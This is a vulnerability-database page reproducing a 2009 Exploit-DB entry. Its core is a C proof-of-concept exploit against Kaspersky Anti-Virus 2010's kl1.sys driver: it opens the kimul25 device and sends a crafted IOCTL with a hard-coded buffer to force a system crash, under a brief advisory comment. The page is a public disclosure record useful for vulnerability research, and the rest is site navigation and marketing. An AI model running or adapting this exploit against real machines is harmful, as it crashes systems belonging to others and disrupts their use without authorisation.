Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kaspersky AV 2010 9.0.0.463 - Local Denial of Service

🗓️ 29 Sep 2009 00:00:00Reported by HeursType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 22 Views

Kaspersky AV 2010 9.0.0.463 Local Denial of Service vulnerability in kl1.sys driver due to unchecked IOCTL input

Code
#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

/*
Program : Kaspersky Anti-Virus 2010 9.0.0.463
Homepage : http://www.kaspersky.com
Discovery : 2009/09/29
Author Contacted : 2009/10/01
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]


//----- Application description


The most trusted virus and spyware protection - premium protection
against viruses, spyware, Trojans, worms, bots and more. Also includes
comprehensive phishing and identity theft defense and superfast performance.

//----- Description of vulnerability

kl1.sys driver don't check inputs address of an IOCTL. An exception can be
thrown if we modify one or two DWORDs.
With my test I can't do best exploitation than a BSOD.

//----- Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Trance

*/

int __cdecl main(int argc, char* argv[])
{
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD Crashing[] = {
0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a,
0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961,
0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9,
0xb5ebadc5
};
BYTE Out[0x20];

printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n");
hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);

DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL);

printf("Sploit Send.\nhDevice = %x\n", hDevice);
CloseHandle(hDevice);
getch();
return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4
kaspersky anti-virus 2010local denial of servicekl1.sys vulnerability
22